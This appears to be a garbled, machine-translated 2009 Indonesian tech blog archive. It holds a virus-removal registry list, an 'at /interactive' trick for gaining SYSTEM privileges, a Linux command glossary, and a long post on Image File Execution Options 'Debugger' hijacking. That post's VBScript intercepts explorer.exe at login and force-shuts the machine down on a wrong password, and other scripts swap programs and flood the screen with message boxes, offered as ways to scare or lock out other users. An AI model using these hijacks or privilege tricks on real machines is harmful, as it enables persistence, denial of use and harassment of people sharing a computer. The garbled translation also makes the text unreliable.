HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ comfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ exefile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ piffile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ regfile \\ shell \\ open \\ command,,, "regedit.exe"% 1 ""

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Classes \\ scrfile \\ shell \\ open \\ command ,,,"""% 1 ""% * "

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Winlogon, Shell, 0, "Explorer.exe"

HKEY_LOCAL_MACHINE \\ software \\ microsoft \\ ole, EnableDCOM, 0, "Y"

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, AntiVirusDisableNotify, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, FirewallDisableNotify, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, AntiVirusOverride, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Security Center, FirewallOverride, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKLM, SYSTEM \\ CurrentControlSet \\ Control \\ LSA, restrictanonymous, 0x00010001, 0

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Explorer \\ Advanced \\ Folder \\ SuperHidden, CheckedValue, 0x00010001, 0

[del]

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System, DisableRegistryTools

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ System, DisableCMD

HKCU, Software \\ Microsoft \\ Windows \\ CurrentVersion \\ Policies \\ Explorer, NoFolderOptions

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows \\ CurrentVersion \\ Run, ctfmon.exe

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ kernelx86

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Services \\ kernelx86

HKLM, SYSTEM \\ CurrentControlSet \\ Services \\ kernelx86

HKLM, SYSTEM \\ CurrentControlSet \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet002 \\ Services \\ mojbtjlt

HKEY_LOCAL_MACHINE \\ SYSTEM \\ ControlSet001 \\ Services \\ Passthru

HKEY_LOCAL_MACHINE \\ Software \\ Policies \\ Microsoft \\ Windows NT \\ SystemRestore

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Policies \\ Microsoft \\ Windows \\ windowsupdate, DoNotAllowXPSP2

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Policies \\ Microsoft \\ Windows \\ windowsupdate

HKEY_LOCAL_MACHINE \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ ctfmon.exe

7. Delete temporary files and temporary Internet files. Please use the tools ATF-Cleaner. Download these tools in http://www.atribune.org/public-beta/ATF-Cleaner.exe addresses.

8. Restore back to the host file in Windows that has been changed by the virus. You can use tools Hoster, please download at the following address http://www.softpedia.com/progDownload/Hoster-Download-27041.html

Click the [Restore MS Hosts File], to restore the Windows hosts file.

9. For optimal cleaning and prevent re-infection, anti-virus scan with up-to-date and was able to detect this virus. You can also use Norman Malware Cleaner, please download at the following address http://www.norman.com/support/support_tools/58732/en.


plenty of people who think that a user with the highest privileges is administrator only. because the user admin is in the trust can solve almost any problem. but the assumption is wrong, because the user with the highest privileges in the window system is the user system.

I have a question for you all, how do I log into the system? (Users 100% free).
- Via the user account is still wrong really.
- Through the registry is not as well.
- Via bruteforce actually not true.
- Via the command prompt if this means that once the new 100% correct.

Just go straight to the topic of his mind:
1. open command prompt
2. Start - Run - cmd.exe - enter
3. you type the command below then you exit the command prompt program.

code: at xx: xx / interactive cmd.exe

with a code of xx: xx is that the code indicates the time when the program your computer to the command prompt run as a system. I usually fill with 1 minute after the hour now. example: 03.00 hours so now I am content with the time 03.01.

- Wait until the command prompt appears with the title c: \\ windows \\ system32 \\ svchost. but it was not a command prompt
- Then you are not a task manager (ctrl + alt + delete / del)
- Open the tab on the processor in task manager and click on "explorer.exe".
now your computer taskbar will disappear and let desktop well and do not in close task manager. because the task manager's user interface system with your user at the time.
- Back to the command prompt
- Type "explorer.exe" warning not to close the command prompt.
- Now taskbar will appear and desktop too. but it will be quite different from the previous one.

with tips and tricks this time you can access all places, all the directories, all registry keys, and they're all here all you can even access the computer without any limits, but is deliberately making the system user can not access.

to return to the previous user and tricks this tip:
- You directly to the command prompt
- Type the following command
code: tskill explorer.exe

if the first order problems that you can use this:
- Task manager
- On the first tab and then you click the new process
- Then you are content with the "explorer.exe"

if you are satisfied you can close task manager and command prompt.
hopefully useful to you all.


Wednesday, December 30, 2009

a tip and trick that is rarely used by the skill or master computer. a tip and trick manipulation this application is not paid manipulation application or free, but sort manipulation this application is running with a ms.word program command winword.exe, excel, or you run IE (internet explorer) but the road is a bad tip and very unique.

the most to the tip and the tip of this trick can be used on the window, even tip no longer is any additional applications. capital is only 99% window (30% and 70% registry script) and 1% using scripting intelligence.

manipulation tip is very well suited to some of those activities as follows:
1. admin who did not want the kind client - kind of.
2. they use the computer together (cafes, computer courses) but did not want certain programs run.
3. personal computers but is very afraid of the brain - manipulate other people or younger.
4. want be different with friends.
5. like ignorant friends or often idle
6. often try to - try

you should know that we will play with the script and the registry. which means quite dangerous if you do not follow the steps - steps from me. and you watch carefully and step by step. If you still do not understand or do not understand you should not directly apply tips and tricks below will result in enough trouble. but when it clearly and understand the tips and please continue with the next trick.

some word
every time you run the program, then the window will check or control of registry keys.

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\



the subkey of the file name and not paths. subkey will be equated with the name that will run progrma. if the same, it will check the string "Debugger". and if the string is the window will run the program in accordance with the contents of the string. try you see below:

code: HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ taskmgr.exe



empty contents you see this image above. so if you run taskmgr.exe from the RUN menu in any EXE location. the program will run no matter the parth or another. but taskmgr.exe subkey contains the string "Debugger" see the picture below.

and the string value "C: \\ Program Files \\ Microsoft Office \\ Office11 \\ WinWord.exe". then each run RUN tasmgr.exe from the menu or from the other tasks that appear not manager instead ms.word.

an application:
with a very simple way as above is enough time to run a malicious intent. yagn as I explained the above, the window will check the existence of the string "debugger" and read the contents to run programs on purpose. but what would happen if the contents of the string "Debugger" in the blank? if nothing happened - what was the try despite a thousand times is not going the way malicious applications. but you do not worry about this tip and trick will not stop here it is still a long way to make our malware and good step if you know about the VBS script.

how to scare computer users:
for example there are users who want ignorant run task manager with CTRL + ALT + DEL, you try to fill the string "Debugger" with "wscript c: \\ skrip.vbs" without the quotes yes.
then you run a note and type the code below:
code: MsgBox ( "How dare you ignorant my computer! it was recorded! who have a computer then going mad !!!")

or the actual format below:
code:
MsgBox ( "message")


then save the file in "C: \\" with the name "skrip.vbs" (unless you set yourself)
now try run task manager.

Make a password to run things
If you want to install the password for the program (eg) task manager, the "Debugger" content with\u003e\u003e "wscript.exe c: \\ skrip.vbs" (without the quotation marks, too)



then type the following script in notepad.
code:


Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
If s = "PASSWORD" Then
  set wscr=CreateObject("WScript.Shell")
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger")
  wscr.exec("taskmgr.exe")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe\debugger","wscript C:\skrip.vbs","REG_SZ"
Else
  Msgbox("Awas kalo coba-coba maen-maen dengan komputer ini!!!")
End IF

then save with the name "skrip.vbs" in C: \\

and IF you want to make a regedit password, live for a new key with the name "regedit" (do not say forget the place. go try to check the above)
then make a string "debugger" and fill with "wscript c: \\ skrip.vbs" (still without the quotes)
contents same as above ... but replace the "wscr.exec (taskmgr.exe)" replaced "wscr.exec (regedit.exe)"
so if password other files ...


if you want to change the password ... clay third row ... PASSWORD said that you replace like-like you is ...
WARNING! Case sensitive password!


Super Security
This time the game was still in VBScript ... a security that can barely broken ... Login PASSWORD SUPER-BAD!




Each run windows, then the application is first run and was followed NTOSKRNL winlogon and result in EXPLORER.
your evil thoughts would lead to "change the debugger to winlogon.exe" ... It's too bad ... now I give a little better: Explorer.
Essentially every time you enter a password window will be prompted by this little program. and if the wrong password, windows will Shutdown!
quite bad right.

Step by Step Procedure

1. Notepad
type the following script

code:
Dim s
s = InputBox("Masukkan kode untuk ngancurin komputer ini:")
set wscr=CreateObject("WScript.Shell")
If s = "PASSWORD" Then
  wscr.RegDelete("HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger")
  wscr.exec("explorer.exe")
  wscr.RegWrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\explorer.exe\debugger","wscript C:\muncul.vbs","REG_SZ"
Else
  Msgbox("Berani ya!!! awas kamu!!!")
  wscr.exec("shutdown -s -f -t 00")
End IF


save with the name "C: \\ muncul.vbs"

2. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe

3. string debugger
in the key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ explorer.exe
for the string "debugger" and fill with "wscript c: \\ muncul.vbs"

4. done
please try restarting your computer and feel Khasiatnya ^ ^

Change the way the program
still remember most of the writing? jalanin the way MS Word MS Excel instead it loh ...
This time I beberin how ...

1. regedit
make key HKLM \\ SOFTWARE \\ Microsoft \\ Windows NT \\ CurrentVersion \\ Image File Execution Options \\ winword.exe

2. string
in key winword.exe, make the string "debugger" and then fill with
excel.exe
or
"c: \\ Program Files \\ Microsoft Office \\ OFFICE11 \\ EXCEL.EXE" with quotation marks (because there are spaces. if no yes no spaces need quotes)

3. done
run the word ... which appears even excel
most evil tricks. Change the program that works with the script!
returned to the VBS mode ...
follow the step above (the word so excel). but debugger replaced so "wscript (jahil.vbs)" (without the quotes )
This script contents jahil.vbs

 code:
set wscr=CreateObject("WScript.Shell")
Msgbox("A Ghost has attacked this computer. This computer may result an invalid execution. Contact your Ghostbusters for more information.")
dim i
for i=0 to 100
   msgbox "Ayo bermain tekan enter 100x! Anda harus menekannya " & 100 - i & "x lagi"
next
msgbox "Gooooooooooooooooooood Byeeeeeeeeeeeeeeee!!!!!"
wscr.exec("c:\Program Files\Microsoft Office\OFFICE11\EXCEL.EXE")

 save with the name "C: \\ jahil.vbs" then run the word ... enjoy tapping


Tuesday, December 22, 2009

is now increasingly widespread technology in use in life. want to do something must use the current technology. a few days ago there was an expert who can make a very cool software and a smile that can measure yourself. by using 3D mapping technology surface test results are very accurate at all, although people in the measure are not facing the camera or even a little spoiled as long as people look on his face but do not look behind it. scale given for the software until the 0% to 100%.


This addition to the software has other features that you can you can use to check directly with the several faces at once. for the process time of less than 0044 seconds (using a PC with a Pentium 4 processor 3.2 GHz. with a file size of just 46 Kb, can be installed on mobile devices.

sorry if there is no link to download because I forgot the link, I apologize to you all.

Monday, December 21, 2009



Your chance to work in offices with computer network systems, must each - each computer in use must have a name or IP address. the actual system as you all network users in the office or where you are, you can use the service as well as possible just to communicate between computers. can you imagine if you space your work with your friend's study apart but still within a network, you must have if your friend needs to SMS or call a friend even ordered.

with the network system is provided by the company to use the best and useful for your work. and you are in one network can communicate, communication as well as chat on facebook and yahoo messenger so you can save your credit.

you want to try the service, follow these steps - the steps below:

1. you must go into the control panel first



2. then you find the administrative tools and then direct you to the service alone, you try perhatiakan example image below.




3. you click 2 times on the option "Messenger" will display a window picture windows as below.


4. then you disable the option Automatic and then make you click ok. then when it's finished will return to the previous page, click again option "Messenger" then you click the option "Start".


5. then you wait until the process is complete, when it's finished you do it this way on your target computer. means that the computer must connect to the same settings in your computer and make sure you know the username and ip address of your target computer. after the above stages you have to do it right and good, it's time to start chatting with your friends with satisfaction and without cost. open command prompt and then when it appears you are typing messages to be sent to your friend. example "hello friend".



Sunday, December 20, 2009


maybe you Infections with a very sophisticated processor and high technology industries in the market in the world. you may not believe this but it's all I've tried on my own computer. if you are interested in tips and trick me this time? want to know, follow the steps - from my simple steps, as follows:

1. you open the RUN
2. then you type regedit in the RUN box earlier.
3. if you can go to regedit then follow the perbagian folder as below:
regedit --- HKLM ---  Hardware --- description --- System --- CentralProcessor --- 0 --- ProcessorNameString

when you get processornamestring, you can change the name processornamestring your liking. pentium how you want it to or whatever you want to give any names. tips and tricks that I use this time only mode on the computer or just display it all. but it can be made to the show style to others.





















Thursday, November 5, 2009

Saturday, October 31, 2009

Tag Technorati: {grup-tag},,
in this post I wanted to share my knowledge of command - the command in linux operating system that is less in interest by many people because it is less familiar but linux is really the same as DOS (disk operating system). but many people say, how do I install a program on linux OS? My answer was very relaxed really easy when we only installation program or application in linux we have to go first to the Comman Prompt or if the windows (DOS). we install the program with the command - the command or with the text. mouse or move the mouse we will no longer work but we are using the keyboard in penginstall is because we use words. so many people who say linux is hard to use once it is not. I want to give a glimpse of the command line is as follows:
Glance Command Line
Just as when we type the command in DOS command line or Linux command line is typed at the prompt and terminated by pressing the Enter key on your keyboard to execute the order.
Command line is a more efficient way to do any work. Therefore, Linux users still rely on this method to work. Beginners should also be aware of and at least once this use command line because one day the knowledge of these commands can be very necessary.
The following will explain some basic commands that may later be used primarily by beginners. Attention: knowledge of the commands that others will soon increase as you progress mastering this Linux operating system.
Explanation of each command will be shortened course and to find out more detail the functions of a command, you can see the manual, for example, by typing man command:
man is the command to display the manual of a command. The way to use it is to type man followed by the command we want to know the manual usage.
Example:
$ Man ls
The above command is used to show how to use the ls command in full.
Command-Linux Basic Commands
As a guide you, here's a list in alphabetical order. Actually, you can just press tab twice to see all possible commands that can be used. Suppose you want to know what the command begins with the letter a, then you just type a then press tab twice!
According Command Alphabetical List
\x26 Adduser alias bg cd cat chgrp chmod chown cp fg halt find grep gzip hostname login logout kill less ls man mkdir more mesg passwd mount mv pwd rm rmdir tail su shutdown umount talk tar unzip the wall who unalias xhost + xset zip
\x26
Command \x26 used to run commands on the back (background) Example:
Command \x26 used behind the other commands to run in the background. What is the street in the background? background road means we allow the system to execute the command itself without our participation, and free the shell / command prompt can be used to run other commands.
See also:
Please see also the bg and fg commands.
adduser
Adduser command is used to add users.
Usually only done by root to add users or new-account. After this command can be continued with the passwd command, the command to create a password for the user. Example:
# Adduser udin
# Passwd udin
Note that all commands that require root access, I have written here by using the sign #, to help you distinguish that the command does not need root access.
If you run the adduser command, you will be asked to enter a password for the user you created. Fill in the password for the new user twice with the same words.
alias
Used to provide another name from a command. For example if you want the ls command can also type the command dir executed with, then make like follows:
$ Alias dir = ls
If you like the colorful display, try experimenting with the following command:
$ Alias dir = ls-ar-color: always
To see the commands have any other name then, just type the alias alone (without argument). See also command unalias.
bg
To force a process is suspended (suspend) to run in the background. Suppose you're running a command in the foreground (without ending the order \x26) and a shell when you need it so you can pause the command with Ctrl-Z and then typing bg command to run the background. In this way you have to free the shell but still maintaining the old command running in the background.
See also command fg.
cat
Displays the contents of a file on the screen. Example:
$ Cat / name / of / file
cd
Change Directory or to move the directory and I think you will have no difficulty using this command because of how similar its use cd command in DOS.
chgrp
This command is used to change the group ownership of files or directories. For example to give permission to the group or groups in order to access a file. Writing syntax is as follows:
# Chgrp
chmod
Used to add and subtract users permission to access files or directories. You can use the numeric system of coding or letter coding system. There are three types of permissions / permits that can be changed as follows:
1. r for read,
2. w for write, and
3. x for execute.
By using the letter coding, you can change the permissions on the above for each u (user), g (group), o (other) and a (all) by only giving the plus sign (+) to add the permission and the minus sign (-) to revoke licenses.
For example to give permission to read and execute files coba1 the owner and group, the command is:
$ Chmod ug + rx coba1
To revoke such permits:
$ Chmod ug-rx coba1
By using a numeric coding system, the permissions for user, group and the other is determined by using a combination of numbers, 4, 2 and 1, where 4 (read), 2 (write) and 1 (execute).
For example to give permission to read (4), write (2) and execution (1) file coba2 to the owner, his orders are:
$ Chmod 700 coba2
Another example, to give permission to read (4) and write (2) coba3 files to a user, please read (4) only to the group and the other, the command is:
$ Chmod 644 coba3
Caution: If you are hosting on Linux based servers, this command is very important for your data security. I recommend all the directories you need not write in chmod 100 (if the Apache way as the current user (you)) or in chmod 501, if the Apache way as www-data or nobody (other users).
chown
Changing the user ID (owner) of a file or directory
$ Chown
cp
To copy a file or copy. For example to copy file1 to file2:
$ Cp
fg
Restoring a process that is stopped while (suspend) to run again in the foreground. See also the bg command above.
find
To find where the location of a file. This command will find files in accordance with the criteria you specify. The syntax is the command itself followed by the beginning of the directory name search, then the file name (can use wild cards, meta characters) and the last to determine how the search results will be displayed. For example to search for all files ending in. Doc in the current directory and display the results on the screen:
$ Find. -name *. doc-print
Example results:
. / public / docs / account.doc
. / public / docs / balance.doc
. / public / docs / statistics / prospek.doc
. / public / docs / statistics / presconf.doc
grep
Global regular expresion is parse or grep commands to find files containing text with the criteria you specified.
Format command:
$ Grep
For example to search for files containing text in the current marginal directory:
$ Grep marginal
diferent.doc: Note: the words used in the marginal area in economics prob.rtf: the function of marginal and marginal cost function if the function prob.rtf: if the marginal cost and marginal result is known then the total cost
gzip
This is a free version of the GNU zip compression functionality is to compress a file. The syntax is very simple:
$ Gzip
However you can give certain parameters if you need a file compression better, please see its manual page. See also the tar file, unzip and zip.
halt
This command can only be run by super user/You must log in as root. This command to tell the kernel to turn off the system or shutdown.
hostname
To display the host or domain name system and can also be used for host name setting system.
Example usage:
[user @ localhost mydirectoryname] $ hostname
localhost.localdomain
kill
This command will send a signal to a process that we set. The aim is to stop the process. Writing format:
$ Kill
PID is a number that will process the stop. Do not know where the PID process would be killed? Try experimenting with the command:
ps aux | grep
less
Functions such as command more.
login
To log into the system by entering a login ID or can also be used to switch from one user to another user.
logout
To get out of the system.
ls
Displays the contents of a directory as the dir command in DOS. You can use several options available to set the display on the screen. When you run this command without any options will be displayed throughout nonhidden files (files without the leading dot) in the alphabet and a broad-screen fill in the fields. Option-He does display all the files / all including hidden files (files with the prefix a dot) with the long format.
man
To display the manual page or text that explains in detail how to use a command. This command is very useful if you occasionally forget or do not know the functions and how to use a command.
$ Man
mesg
This command is used by the user to give permission to another user terminal display screen messages. For example you are in a position mesg y so other users can display a message on your screen to write or talk.
$ Mesg y or mesg n
Use mesg n if you do not want to be bothered with the display messages from other users.
mkdir
Make a new directory, the same as in DOS md command. a
more
Mempaging page, as well as less
mount
This command will mount the filesystem to a directory or mount-point specified. Only the superuser can run this command. To see what filesystems mount-pointnya and then, type the mount command. This command can you learn in the chapter on the filesystem. See also the command umount.
$ Mount
/ dev/hda3 on / type ext2 (rw)
none on / proc type proc (rw)
/ dev/hda1 on / dos type vfat (rw)
/ dev/hda4 on / usr type ext2 (rw)
none on / dev / pts type devpts (rw, mode = 0622)
mv
To move files from one location to another. If the second argument will be a directory mv will move the files to that directory. If the second argument is the name of the file the first file will overwrite the second file. Be in error if you enter more than two arguments except the last argument in the form of a directory.
passwd
Used to change the password. You will always be asked to fill in your old password and then be asked to fill in new password twice. Password consisting of at least six characters and contain at least one character.
pwd
Print working directory, or to display the name of your current directory where it was located.
rm
To delete a file and by default, rm does not remove directories. Use with caution, especially with this command option-r which can recursively delete entire file.
Once again: Be careful with this command!
rmdir
To remove an empty directory.
shutdown
This command to turn off the system, such as the halt command. On some systems you can stop the computer with the command shutdown-h now and restart the system with the command shutdown-r now or in combination with the Ctr-Alt-Del.
su
To login as a different user. If the user ID is not included then the computer thinks you want to login as a super user or root. If you are not root and other users have the password then you must enter the correct password. But if you are root then you can login as another user without the user knowing the password.
tail
Displaying 10 lines of a file. Default line shown is 10 but you can decide yourself how many rows you want displayed:
$ Tail
talk
To hold a conversation through a terminal. Input from the terminal you will be copied in other user terminals, so the opposite.
tar
Store and extract files from media such as tape drives or hard disk. Archive file is often referred to as tar files. Sintaknya as follows:
$ Tar
Example:
$ Tar-czvf namaFile.tar.gz / name / directory / *
The above command is used to include all the contents of the directory, and then compressed with tar format and in zipped with gzip, which produces a file named namaFile.tar.gz
$ Tar-xzvf namaFile.tar.gz
The above command to extract the files namaFile.tar.gz
umount
Is the reverse of the mount command, which is to unmount the filesystem from the mount-pointnya. After this command to be executed directory mount-point no longer be used.
# Umount
unalias
In contrast to the alias command, this command will cancel an alias. So to cancel the alias dir as has been exemplified above, use the command:
$ Unalias dir
unzip
Used to extract or compress files that describe the zip. syntax simple and will extract the files you specify:
$ Unzip
See also the commands gzip and unzip it.
wall
Sending messages and displays them in each user terminal being logged. This command is useful for the superuser or root to give a warning to all users, such as notification that the server will shut down for a moment longer.
# Wall Dear, everyone ... .. immediately save your work, I'll turn off the server 10 minutes.
who
To show who was logged. This command will display information about the login name, terminal type, login time and remote hostname for each user who was logged. For example:
$ Who
root ttyp0 May 22 11:44
flory ttyp2 May 22 11:59
pooh ttyp3 May 22 12:08
xhost +
This command is used to grant access or remove access (xhost -) host or user to a server X.
xset
This command to set some option in the X Window as a bell, mouse speed, fonts, screen saver parameters and so forth. For example the sound of the bell and the speed of your mouse can be set using this command:
$ Xset b
$ Xset m
zip
This command will create and add files to the zip archive file. See also command gzip and unzip it.
Subscribe to RSS Feed Follow me on Twitter!